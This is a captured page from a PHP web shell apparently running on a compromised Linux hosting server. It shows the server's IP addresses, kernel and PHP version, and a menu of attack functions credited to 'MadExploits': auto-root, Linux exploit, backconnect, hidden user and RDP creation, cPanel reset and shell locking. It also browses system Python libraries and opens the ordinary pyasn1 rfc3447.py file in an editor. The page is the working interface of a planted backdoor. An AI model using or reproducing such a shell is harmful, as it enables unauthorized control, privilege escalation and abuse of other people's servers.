Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
pyasn1_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
65
B
-rw-r--r--
pem.py
2
KB
-rw-r--r--
rfc1155.py
2.61
KB
-rw-r--r--
rfc1157.py
3.46
KB
-rw-r--r--
rfc1901.py
640
B
-rw-r--r--
rfc1902.py
3.61
KB
-rw-r--r--
rfc1905.py
4.72
KB
-rw-r--r--
rfc2251.py
26.29
KB
-rw-r--r--
rfc2314.py
1.28
KB
-rw-r--r--
rfc2315.py
9.42
KB
-rw-r--r--
rfc2437.py
2.56
KB
-rw-r--r--
rfc2459.py
48.84
KB
-rw-r--r--
rfc2511.py
10.12
KB
-rw-r--r--
rfc2560.py
8.2
KB
-rw-r--r--
rfc3279.py
5.83
KB
-rw-r--r--
rfc3280.py
45.57
KB
-rw-r--r--
rfc3281.py
9.63
KB
-rw-r--r--
rfc3412.py
1.9
KB
-rw-r--r--
rfc3414.py
1.13
KB
-rw-r--r--
rfc3447.py
1.57
KB
-rw-r--r--
rfc3852.py
19.64
KB
-rw-r--r--
rfc4210.py
27.71
KB
-rw-r--r--
rfc4211.py
11.83
KB
-rw-r--r--
rfc5208.py
1.39
KB
-rw-r--r--
rfc5280.py
48.34
KB
-rw-r--r--
rfc5652.py
19.64
KB
-rw-r--r--
rfc6402.py
14.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rfc3447.py
# # This file is part of pyasn1-modules software. # # Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com> # License: http://pyasn1.sf.net/license.html # # PKCS#1 syntax # # ASN.1 source from: # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.asn # # Sample captures could be obtained with "openssl genrsa" command # from pyasn1.type import constraint from pyasn1.type import namedval from pyasn1_modules.rfc2437 import * class OtherPrimeInfo(univ.Sequence): componentType = namedtype.NamedTypes( namedtype.NamedType('prime', univ.Integer()), namedtype.NamedType('exponent', univ.Integer()), namedtype.NamedType('coefficient', univ.Integer()) ) class OtherPrimeInfos(univ.SequenceOf): componentType = OtherPrimeInfo() subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX) class RSAPrivateKey(univ.Sequence): componentType = namedtype.NamedTypes( namedtype.NamedType('version', univ.Integer(namedValues=namedval.NamedValues(('two-prime', 0), ('multi', 1)))), namedtype.NamedType('modulus', univ.Integer()), namedtype.NamedType('publicExponent', univ.Integer()), namedtype.NamedType('privateExponent', univ.Integer()), namedtype.NamedType('prime1', univ.Integer()), namedtype.NamedType('prime2', univ.Integer()), namedtype.NamedType('exponent1', univ.Integer()), namedtype.NamedType('exponent2', univ.Integer()), namedtype.NamedType('coefficient', univ.Integer()), namedtype.OptionalNamedType('otherPrimeInfos', OtherPrimeInfos()) )
Close